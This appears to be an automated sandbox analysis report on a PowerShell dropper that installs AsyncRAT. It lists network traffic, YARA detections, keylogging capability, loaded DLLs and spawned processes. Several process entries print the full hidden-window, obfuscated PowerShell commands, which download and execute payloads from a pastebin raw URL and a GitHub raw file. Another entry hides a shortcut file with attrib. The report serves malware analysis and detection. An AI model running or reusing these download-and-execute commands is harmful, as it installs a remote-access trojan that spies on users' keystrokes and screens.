              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49724 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Contains functionality to log keystrokes (.Net Source)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_4860.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi64_5812.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPEMatched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
              Source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPEMatched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
              Source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
              Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 316, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4860, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF887CDE7E61_2_00007FF887CDE7E6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF887CDF5921_2_00007FF887CDF592
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887CDC72210_2_00007FF887CDC722
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887CDB97610_2_00007FF887CDB976
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887CE7E7710_2_00007FF887CE7E77
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CDDEE213_2_00007FF887CDDEE2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CDD13613_2_00007FF887CDD136
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CD94F013_2_00007FF887CD94F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CDF62213_2_00007FF887CDF622
              Source: amsi64_4860.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi64_5812.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPEMatched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPEMatched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: powershell.exe PID: 316, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4860, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@27/29@4/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\lUsD8dOCffz6TR7t
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_geq1rn3w.xcx.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
              Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP"
              Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP"Jump to behavior
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP"
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
